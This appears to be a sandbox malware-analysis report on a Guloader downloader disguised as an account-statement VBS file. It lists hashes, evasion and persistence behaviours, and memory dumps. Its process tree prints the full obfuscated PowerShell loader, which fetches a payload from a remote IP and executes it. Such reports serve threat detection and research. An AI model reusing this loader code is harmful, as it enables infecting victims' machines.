Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

STatEment-...00.vbs

windows7-x64

10

STatEment-...00.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/05/2023, 02:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs

  • Size

    31KB

  • MD5

    58cba3aa60ed8857deb32d90c47660b1

  • SHA1

    4cc7ea4c8fa38f54fe77185e6946ae71341c5bd3

  • SHA256

    6ac3b02c068631d96b3fef677a7145b1d1d327af6f8b625f1536959bf69a1ab4

  • SHA512

    3e718367014d6ffaefa2531f5fafc1cd3741d25b70298ce7caed2f83041b1ef4f947f90f53b827b3206d161fd19a6776c32f458b6e9e11128f2792640e14657a

  • SSDEEP

    768:cuKPqBHxLXe21oomQdDPgl3nn4kFP7vdlrMpu6nq6S:FRxLu21oomQdcl3n4kFPH4DNS

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetWindowsHookEx
          PID:1700

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\lowegs.dat
    Filesize

    184B

    MD5

    19e86664068c0827b0751a314c1c988d

    SHA1

    5e07b21d7ec3d1ec314722144975cbec666d8daa

    SHA256

    f30699a8f8f664bd8b4ff21aa8dd5921a9a3a4f68d371cc35f4abc69c37cb9f8

    SHA512

    e5d0fe87e900fcd3554aedd5330f7ca3f3426fa31a52ab7bcd89bdb24be279d1d12d29cb8914b10ca066219cdfb03636cae067432358ef44a09f72dddf255cbb

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qteizhym.rd3.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1700-182-0x0000000000630000-0x0000000003DFF000-memory.dmp

    Filesize

    55.8MB

    Download

  • memory/1700-180-0x0000000000630000-0x0000000003DFF000-memory.dmp

    Filesize

    55.8MB

    Download

  • memory/1700-179-0x0000000000630000-0x0000000003DFF000-memory.dmp

    Filesize

    55.8MB

    Download

  • memory/1816-142-0x000001E555020000-0x000001E555042000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1816-143-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1816-144-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1816-145-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1816-172-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1816-171-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1816-170-0x000001E555080000-0x000001E555090000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-166-0x0000000007600000-0x0000000007696000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2228-151-0x0000000005CF0000-0x0000000005D56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2228-164-0x0000000007BD0000-0x000000000824A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2228-165-0x00000000068E0000-0x00000000068FA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2228-162-0x0000000006360000-0x000000000637E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2228-167-0x0000000007560000-0x0000000007582000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2228-168-0x0000000008800000-0x0000000008DA4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2228-169-0x0000000007990000-0x00000000079A4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2228-157-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-163-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-150-0x0000000005BD0000-0x0000000005C36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2228-173-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-174-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-175-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2228-178-0x0000000007A30000-0x0000000007A31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2228-177-0x0000000008DB0000-0x000000000C57F000-memory.dmp

    Filesize

    55.8MB

    Download

  • memory/2228-149-0x00000000054A0000-0x00000000054C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2228-148-0x00000000055A0000-0x0000000005BC8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2228-147-0x0000000004DA0000-0x0000000004DD6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2228-146-0x0000000004F60000-0x0000000004F70000-memory.dmp

    Filesize

    64KB

    Download